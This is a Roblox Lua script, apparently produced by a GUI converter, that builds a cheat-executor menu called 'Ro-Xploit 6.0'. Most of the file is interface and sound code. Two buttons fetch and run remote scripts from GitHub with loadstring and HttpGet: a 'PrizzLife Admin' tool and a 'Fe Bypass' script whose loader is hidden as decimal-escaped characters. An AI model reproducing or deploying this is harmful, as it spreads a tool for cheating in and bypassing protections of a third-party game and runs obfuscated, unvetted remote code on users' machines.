-- Gui to Lua -- Version: 3.2 -- Instances: local RX6 = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local Frame_2 = Instance.new("Frame") local Main = Instance.new("Frame") local Frame_3 = Instance.new("Frame") local Frame_4 = Instance.new("Frame") local FirstTab = Instance.new("Frame") local ScrollingFrame = Instance.new("ScrollingFrame") local TextButton = Instance.new("TextButton") local TextLabel = Instance.new("TextLabel") local ScriptTab = Instance.new("Frame") local Frame_5 = Instance.new("Frame") local TextButton_2 = Instance.new("TextButton") local TextButton2 = Instance.new("TextButton") local Folder = Instance.new("Folder") local Cube = Instance.new("Frame") local TextButton_3 = Instance.new("TextButton") local TextLabel_2 = Instance.new("TextLabel") local TextLabel_3 = Instance.new("TextLabel") local Cube1 = Instance.new("Frame") local TextButton_4 = Instance.new("TextButton") local TextLabel_4 = Instance.new("TextLabel") local TextLabel_5 = Instance.new("TextLabel") local Sound = Instance.new("Folder") local Frame_6 = Instance.new("Frame") local ExecButton = Instance.new("TextButton") local TextBox = Instance.new("TextBox") local ScrollingFrame_2 = Instance.new("ScrollingFrame") local Frame_7 = Instance.new("Frame") local Tab = Instance.new("TextButton") local Tab1 = Instance.new("TextButton") local Frame_8 = Instance.new("Frame") local Frame_9 = Instance.new("Frame") local Frame_10 = Instance.new("Frame") local TextButton_5 = Instance.new("TextButton") local TextLabel_6 = Instance.new("TextLabel") local ImageLabel = Instance.new("ImageLabel") --Properties: RX6.Name = "RX6" RX6.Parent = game.CoreGui RX6.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Frame.Parent = RX6 Frame.Position = UDim2.new(0.5, -229, 0.5, -177) Frame.Size = UDim2.new(0, 475, 0, 20) Frame.ZIndex = 55 Frame.Style = Enum.FrameStyle.RobloxRound Frame_2.Parent = Frame Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_2.BorderSizePixel = 0 Frame_2.Position = UDim2.new(0, -20, 0, -20) Frame_2.Size = UDim2.new(0, 500, 0, 350) Frame_2.ZIndex = -2 Frame_2.Style = Enum.FrameStyle.RobloxRound Main.Name = "Main" Main.Parent = Frame_2 Main.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Main.BorderColor3 = Color3.fromRGB(0, 0, 0) Main.BorderSizePixel = 0 Main.Position = UDim2.new(0, 5, 0, 30) Main.Size = UDim2.new(1, -10, 1, -35) Main.Style = Enum.FrameStyle.RobloxRound Frame_3.Parent = Main Frame_3.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Frame_3.BackgroundTransparency = 0.750 Frame_3.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_3.BorderSizePixel = 0 Frame_3.Position = UDim2.new(0, 115, 0, 0) Frame_3.Size = UDim2.new(1, -115, 1, 0) Frame_4.Parent = Frame_3 Frame_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame_4.BackgroundTransparency = 1.000 Frame_4.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_4.BorderSizePixel = 0 Frame_4.Size = UDim2.new(1, -10, 1, 0) FirstTab.Name = "FirstTab" FirstTab.Parent = Frame_4 FirstTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255) FirstTab.BackgroundTransparency = 1.000 FirstTab.BorderColor3 = Color3.fromRGB(0, 0, 0) FirstTab.BorderSizePixel = 0 FirstTab.Size = UDim2.new(1, 0, 1, 0) FirstTab.Visible = false ScrollingFrame.Parent = FirstTab ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame.BackgroundTransparency = 1.000 ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) ScrollingFrame.BorderSizePixel = 0 ScrollingFrame.Size = UDim2.new(1, 10, 1, 0) ScrollingFrame.ScrollBarThickness = 10 TextButton.Parent = ScrollingFrame TextButton.BackgroundColor3 = Color3.fromRGB(0, 75, 150) TextButton.BackgroundTransparency = 0.850 TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton.BorderSizePixel = 0 TextButton.Size = UDim2.new(1, -10, 0, 35) TextButton.Font = Enum.Font.SourceSans TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton.TextSize = 14.000 TextButton.TextStrokeTransparency = 0.500 TextLabel.Parent = ScrollingFrame TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0.0058308146, 0, 0.0848057643, -6) TextLabel.Size = UDim2.new(0, 328, 0, 209) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Remake made by: BroSploits, And Ui made by krystalteam" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextSize = 14.000 TextLabel.TextStrokeTransparency = 0.500 TextLabel.TextWrapped = true TextLabel.TextXAlignment = Enum.TextXAlignment.Left TextLabel.TextYAlignment = Enum.TextYAlignment.Top ScriptTab.Name = "Script Tab" ScriptTab.Parent = Frame_4 ScriptTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScriptTab.BackgroundTransparency = 1.000 ScriptTab.BorderColor3 = Color3.fromRGB(0, 0, 0) ScriptTab.BorderSizePixel = 0 ScriptTab.Size = UDim2.new(1, 0, 1, 0) Frame_5.Parent = ScriptTab Frame_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame_5.BackgroundTransparency = 1.000 Frame_5.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_5.BorderSizePixel = 0 Frame_5.ClipsDescendants = true Frame_5.Position = UDim2.new(0, 0, 0, 35) Frame_5.Size = UDim2.new(1, 0, 1, -35) TextButton_2.Parent = Frame_5 TextButton_2.BackgroundColor3 = Color3.fromRGB(0, 75, 150) TextButton_2.BackgroundTransparency = 0.850 TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton_2.BorderSizePixel = 0 TextButton_2.Size = UDim2.new(0, 50, 1, 0) TextButton_2.Font = Enum.Font.SourceSans TextButton_2.Text = "<" TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_2.TextScaled = true TextButton_2.TextSize = 36.000 TextButton_2.TextStrokeTransparency = 0.500 TextButton_2.TextWrapped = true TextButton2.Name = "TextButton2" TextButton2.Parent = Frame_5 TextButton2.BackgroundColor3 = Color3.fromRGB(0, 75, 150) TextButton2.BackgroundTransparency = 0.850 TextButton2.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton2.BorderSizePixel = 0 TextButton2.Position = UDim2.new(1, -50, 0, 0) TextButton2.Size = UDim2.new(0, 50, 1, 0) TextButton2.Font = Enum.Font.SourceSans TextButton2.Text = ">" TextButton2.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton2.TextScaled = true TextButton2.TextSize = 1.000 TextButton2.TextStrokeTransparency = 0.500 TextButton2.TextWrapped = true Folder.Parent = Frame_5 Cube.Name = "Cube" Cube.Parent = Folder Cube.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Cube.BackgroundTransparency = 0.850 Cube.BorderColor3 = Color3.fromRGB(0, 0, 0) Cube.BorderSizePixel = 0 Cube.Position = UDim2.new(0.512012005, -75, 0.399193555, -50) Cube.Size = UDim2.new(0, 150, 0, 150) TextButton_3.Parent = Cube TextButton_3.BackgroundColor3 = Color3.fromRGB(0, 75, 150) TextButton_3.BackgroundTransparency = 0.850 TextButton_3.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton_3.BorderSizePixel = 0 TextButton_3.Position = UDim2.new(0.126666665, 0, 0.699999988, 0) TextButton_3.Size = UDim2.new(0.75, 0, 0.200000003, 0) TextButton_3.Font = Enum.Font.SourceSans TextButton_3.Text = "Execute" TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_3.TextScaled = true TextButton_3.TextSize = 39.000 TextButton_3.TextStrokeTransparency = 0.500 TextButton_3.TextWrapped = true TextLabel_2.Parent = Cube TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BackgroundTransparency = 1.000 TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel_2.BorderSizePixel = 0 TextLabel_2.Position = UDim2.new(0, 0, 0.150000006, 0) TextLabel_2.Size = UDim2.new(1, 0, 0.100000001, 0) TextLabel_2.Font = Enum.Font.SourceSans TextLabel_2.Text = "PrizzLife Admin" TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.TextSize = 19.000 TextLabel_2.TextStrokeTransparency = 0.500 TextLabel_2.TextWrapped = true TextLabel_3.Parent = Cube TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.BackgroundTransparency = 1.000 TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel_3.BorderSizePixel = 0 TextLabel_3.Size = UDim2.new(0, 100, 0, 20) TextLabel_3.Font = Enum.Font.SourceSans TextLabel_3.Text = " ID: 1" TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.TextSize = 15.000 TextLabel_3.TextStrokeTransparency = 0.500 TextLabel_3.TextWrapped = true TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left Cube1.Name = "Cube1" Cube1.Parent = Folder Cube1.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Cube1.BackgroundTransparency = 0.850 Cube1.BorderColor3 = Color3.fromRGB(0, 0, 0) Cube1.BorderSizePixel = 0 Cube1.Position = UDim2.new(0.905405343, -75, 0.286290318, -50) Cube1.Size = UDim2.new(0, 75, 0, 75) TextButton_4.Parent = Cube1 TextButton_4.BackgroundColor3 = Color3.fromRGB(0, 75, 150) TextButton_4.BackgroundTransparency = 0.850 TextButton_4.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton_4.BorderSizePixel = 0 TextButton_4.Position = UDim2.new(0.126666665, 0, 0.699999988, 0) TextButton_4.Size = UDim2.new(0.75, 0, 0.200000003, 0) TextButton_4.Font = Enum.Font.SourceSans TextButton_4.Text = "Execute" TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_4.TextScaled = true TextButton_4.TextSize = 39.000 TextButton_4.TextStrokeTransparency = 0.500 TextButton_4.TextWrapped = true TextLabel_4.Parent = Cube1 TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.BackgroundTransparency = 1.000 TextLabel_4.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel_4.BorderSizePixel = 0 TextLabel_4.Position = UDim2.new(0, 0, 0.150000006, 0) TextLabel_4.Size = UDim2.new(1, 0, 0.100000001, 0) TextLabel_4.Font = Enum.Font.SourceSans TextLabel_4.Text = "Fe Bypass" TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.TextSize = 19.000 TextLabel_4.TextStrokeTransparency = 0.500 TextLabel_4.TextWrapped = true TextLabel_5.Parent = Cube1 TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.BackgroundTransparency = 1.000 TextLabel_5.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel_5.BorderSizePixel = 0 TextLabel_5.Size = UDim2.new(0, 100, 0, 20) TextLabel_5.Font = Enum.Font.SourceSans TextLabel_5.Text = " ID: 2" TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.TextSize = 15.000 TextLabel_5.TextStrokeTransparency = 0.500 TextLabel_5.TextWrapped = true TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left Sound.Name = "Sound" Sound.Parent = Folder Frame_6.Parent = ScriptTab Frame_6.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Frame_6.BackgroundTransparency = 0.850 Frame_6.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_6.BorderSizePixel = 0 Frame_6.Size = UDim2.new(1, 0, 0, 35) ExecButton.Name = "ExecButton" ExecButton.Parent = Frame_6 ExecButton.BackgroundColor3 = Color3.fromRGB(0, 75, 150) ExecButton.BackgroundTransparency = 0.850 ExecButton.BorderColor3 = Color3.fromRGB(0, 0, 0) ExecButton.BorderSizePixel = 0 ExecButton.Position = UDim2.new(1, -75, 0, 5) ExecButton.Size = UDim2.new(0, 70, 0, 25) ExecButton.Font = Enum.Font.SourceSans ExecButton.Text = "Execute" ExecButton.TextColor3 = Color3.fromRGB(255, 255, 255) ExecButton.TextSize = 14.000 ExecButton.TextStrokeTransparency = 0.500 TextBox.Parent = Frame_6 TextBox.BackgroundColor3 = Color3.fromRGB(0, 75, 150) TextBox.BackgroundTransparency = 0.850 TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0) TextBox.BorderSizePixel = 0 TextBox.Position = UDim2.new(0, 5, 0, 5) TextBox.Size = UDim2.new(1, -85, 0, 25) TextBox.Font = Enum.Font.SourceSansBold TextBox.PlaceholderColor3 = Color3.fromRGB(178, 178, 178) TextBox.Text = "" TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.TextSize = 12.000 TextBox.TextStrokeTransparency = 0.500 ScrollingFrame_2.Parent = Main ScrollingFrame_2.Active = true ScrollingFrame_2.BackgroundColor3 = Color3.fromRGB(0, 75, 150) ScrollingFrame_2.BackgroundTransparency = 0.750 ScrollingFrame_2.BorderColor3 = Color3.fromRGB(0, 0, 0) ScrollingFrame_2.BorderSizePixel = 0 ScrollingFrame_2.Size = UDim2.new(0, 110, 1, 0) ScrollingFrame_2.ScrollBarThickness = 10 Frame_7.Parent = ScrollingFrame_2 Frame_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame_7.BackgroundTransparency = 1.000 Frame_7.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_7.BorderSizePixel = 0 Frame_7.Size = UDim2.new(0, 100, 0, 0) Tab.Name = "Tab" Tab.Parent = Frame_7 Tab.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Tab.BackgroundTransparency = 0.850 Tab.BorderColor3 = Color3.fromRGB(0, 0, 0) Tab.BorderSizePixel = 0 Tab.Position = UDim2.new(0, 5, 0, 5) Tab.Size = UDim2.new(1, -10, 0, 35) Tab.Font = Enum.Font.SourceSans Tab.Text = "Credits" Tab.TextColor3 = Color3.fromRGB(255, 255, 255) Tab.TextSize = 15.000 Tab.TextStrokeTransparency = 0.500 Tab.TextWrapped = true Tab1.Name = "Tab1" Tab1.Parent = Frame_7 Tab1.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Tab1.BackgroundTransparency = 0.850 Tab1.BorderColor3 = Color3.fromRGB(0, 0, 0) Tab1.BorderSizePixel = 0 Tab1.Position = UDim2.new(0.389999986, -34, 57, 45) Tab1.Size = UDim2.new(1, -10, 0, 35) Tab1.Font = Enum.Font.SourceSans Tab1.Text = "Script Tab" Tab1.TextColor3 = Color3.fromRGB(255, 255, 255) Tab1.TextSize = 15.000 Tab1.TextStrokeTransparency = 0.500 Tab1.TextWrapped = true Frame_8.Parent = Main Frame_8.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Frame_8.BackgroundTransparency = 0.750 Frame_8.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_8.BorderSizePixel = 0 Frame_8.Position = UDim2.new(0, 100, 0, 0) Frame_8.Size = UDim2.new(0, 10, 1, 0) Frame_9.Parent = Main Frame_9.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Frame_9.BackgroundTransparency = 0.500 Frame_9.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_9.BorderSizePixel = 0 Frame_9.Position = UDim2.new(0, 110, 0, 0) Frame_9.Size = UDim2.new(0, 5, 1, 0) Frame_10.Parent = Main Frame_10.BackgroundColor3 = Color3.fromRGB(0, 75, 150) Frame_10.BackgroundTransparency = 0.750 Frame_10.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_10.BorderSizePixel = 0 Frame_10.Position = UDim2.new(1, -10, 0, 0) Frame_10.Size = UDim2.new(0, 10, 1, 0) TextButton_5.Parent = Frame TextButton_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_5.BackgroundTransparency = 1.000 TextButton_5.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton_5.BorderSizePixel = 0 TextButton_5.Position = UDim2.new(1, -15, 0, -9) TextButton_5.Size = UDim2.new(0, 20, 0, 20) TextButton_5.Font = Enum.Font.Arial TextButton_5.Text = "x" TextButton_5.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_5.TextSize = 20.000 TextButton_5.TextStrokeTransparency = 0.500 TextLabel_6.Parent = Frame TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.BackgroundTransparency = 1.000 TextLabel_6.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel_6.BorderSizePixel = 0 TextLabel_6.Position = UDim2.new(0, 15, 0, -2) TextLabel_6.Size = UDim2.new(0.5, 0, 1, 0) TextLabel_6.Font = Enum.Font.SourceSans TextLabel_6.Text = "Ro-Xploit 6.0" TextLabel_6.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.TextSize = 22.000 TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left ImageLabel.Parent = Frame ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) ImageLabel.BorderSizePixel = 0 ImageLabel.Position = UDim2.new(0, -62, 0, -61) ImageLabel.Size = UDim2.new(0, 100, 0, 100) ImageLabel.Image = "rbxassetid://278201073" -- Scripts: local function RAIIMJ_fake_script() -- FirstTab.ToggleFrameVisibility local script = Instance.new('LocalScript', FirstTab) local frame = script.Parent local frame2 = script.Parent.Parent["Script Tab"] local toggleButton = frame.Parent.Parent.Parent.ScrollingFrame.Frame.Tab toggleButton.MouseButton1Click:Connect(function() if not frame.Visible then frame.Visible = true frame2.Visible = false end end) end coroutine.wrap(RAIIMJ_fake_script)() local function SMBMA_fake_script() -- TextButton_2.LocalScript local script = Instance.new('LocalScript', TextButton_2) local TweenService = game:GetService("TweenService") local button = script.Parent local button2 = script.Parent.Parent.TextButton2 local cube = script.Parent.Parent.Folder:FindFirstChild('Cube') local cube1 = script.Parent.Parent.Folder:FindFirstChild('Cube1') local hasTweened = false local originalCubePosition = UDim2.new(0.512, -75, 0.399, -50) local originalCubeSize = UDim2.new(0, 150, 0, 150) local originalCube1Position = UDim2.new(0.905, -75, 0.286, -50) local originalCube1Size = UDim2.new(0, 75, 0, 75) local function playTween() local tweenInfo = TweenInfo.new(1, Enum.EasingStyle.Quad, Enum.EasingDirection.Out) local cubeGoal = { Position = UDim2.new(0.344, -75, 0.286, -50), Size = UDim2.new(0, 75, 0, 75), } local cubeTween = TweenService:Create(cube, tweenInfo, cubeGoal) cubeTween:Play() local cube1Goal = { Position = UDim2.new(0.512, -75, 0.399, -50), Size = UDim2.new(0, 150, 0, 150), } local cube1Tween = TweenService:Create(cube1, tweenInfo, cube1Goal) cube1Tween:Play() hasTweened = true end button2.MouseButton1Click:Connect(function() if cube and cube1 then if not hasTweened then playTween() end end end) button.MouseButton1Click:Connect(function() if cube and cube1 then local tweenInfo = TweenInfo.new(1, Enum.EasingStyle.Quad, Enum.EasingDirection.Out) local resetCubeGoal = { Position = originalCubePosition, Size = originalCubeSize, } local resetCubeTween = TweenService:Create(cube, tweenInfo, resetCubeGoal) resetCubeTween:Play() local resetCube1Goal = { Position = originalCube1Position, Size = originalCube1Size, } local resetCube1Tween = TweenService:Create(cube1, tweenInfo, resetCube1Goal) resetCube1Tween:Play() resetCube1Tween.Completed:Connect(function() hasTweened = false end) end end) end coroutine.wrap(SMBMA_fake_script)() local function GWUTHV_fake_script() -- TextButton_2.Sound local script = Instance.new('Script', TextButton_2) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(GWUTHV_fake_script)() local function TNFJ_fake_script() -- TextButton2.Sound local script = Instance.new('Script', TextButton2) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(TNFJ_fake_script)() local function TKWZEKR_fake_script() -- TextButton_3.Ur_Script_Here local script = Instance.new('LocalScript', TextButton_3) script.Parent.MouseButton1Click:Connect(function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet('https://raw.githubusercontent.com/devguy100/PrizzLife/main/Source/release_v0.8.1.lua'))() end) end coroutine.wrap(TKWZEKR_fake_script)() local function UKIVY_fake_script() -- TextButton_3.Sound local script = Instance.new('Script', TextButton_3) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(UKIVY_fake_script)() local function FIUP_fake_script() -- TextButton_4.Ur_Script_Here local script = Instance.new('LocalScript', TextButton_4) script.Parent.MouseButton1Click:Connect(function() loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")() end) end coroutine.wrap(FIUP_fake_script)() local function TRYQ_fake_script() -- TextButton_4.Sound local script = Instance.new('Script', TextButton_4) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(TRYQ_fake_script)() local function CHOCW_fake_script() -- ScriptTab.ToggleFrameVisibility local script = Instance.new('LocalScript', ScriptTab) local frame = script.Parent local fr2 = script.Parent.Parent.FirstTab local toggleButton = frame.Parent.Parent.Parent.ScrollingFrame.Frame.Tab1 toggleButton.MouseButton1Click:Connect(function() if not frame.Visible then frame.Visible = true fr2.Visible = false end end) end coroutine.wrap(CHOCW_fake_script)() local function WYRXM_fake_script() -- ExecButton.LocalScript local script = Instance.new('LocalScript', ExecButton) local button = script.Parent local textBox = button.Parent:FindFirstChild("TextBox") -- Assuming the TextBox is a sibling to the TextButton inside the same parent button.MouseButton1Click:Connect(function() if textBox and textBox.Text == "1" or textBox.Text == "For Loop" then print'hello' elseif textBox and textBox.Text == "2" or textBox.Text == 'Script' then for i = 1,5 do print(i) end end end) end coroutine.wrap(WYRXM_fake_script)() local function JUMKKWH_fake_script() -- ExecButton.Sound local script = Instance.new('Script', ExecButton) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(JUMKKWH_fake_script)() local function QURDTY_fake_script() -- Tab.Sound local script = Instance.new('Script', Tab) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(QURDTY_fake_script)() local function ZWYWDZX_fake_script() -- Tab1.LocalScript local script = Instance.new('LocalScript', Tab1) end coroutine.wrap(ZWYWDZX_fake_script)() local function AETZXRT_fake_script() -- Tab1.Sound local script = Instance.new('Script', Tab1) script.Parent.MouseButton1Click:Connect(function() local NewSound = Instance.new('Sound') NewSound.SoundId = 'rbxassetid://156785206' NewSound.Parent = game:GetService('Workspace') NewSound:Play() wait(1) NewSound:Destroy() end) end coroutine.wrap(AETZXRT_fake_script)() local function QMFK_fake_script() -- ImageLabel.RotateImageLabel local script = Instance.new('LocalScript', ImageLabel) local imageLabel = script.Parent local rotationSpeed = 2 while true do for angle = -10, 10, rotationSpeed do imageLabel.Rotation = angle task.wait(0.05) end for angle = 10, -10, -rotationSpeed do imageLabel.Rotation = angle task.wait(0.05) end end end coroutine.wrap(QMFK_fake_script)() local function EYBEWWE_fake_script() -- Frame.UIDrag local script = Instance.new('LocalScript', Frame) -- Made by Real_IceyDev (@lceyDex) -- -- Simple UI dragger (PC Only/Any device that has a mouse) -- local UIS = game:GetService('UserInputService') local frame = script.Parent local dragToggle = nil local dragSpeed = 0.25 local dragStart = nil local startPos = nil local function updateInput(input) local delta = input.Position - dragStart local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) game:GetService('TweenService'):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play() end frame.InputBegan:Connect(function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then dragToggle = true dragStart = input.Position startPos = frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragToggle = false end end) end end) UIS.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then if dragToggle then updateInput(input) end end end) end coroutine.wrap(EYBEWWE_fake_script)()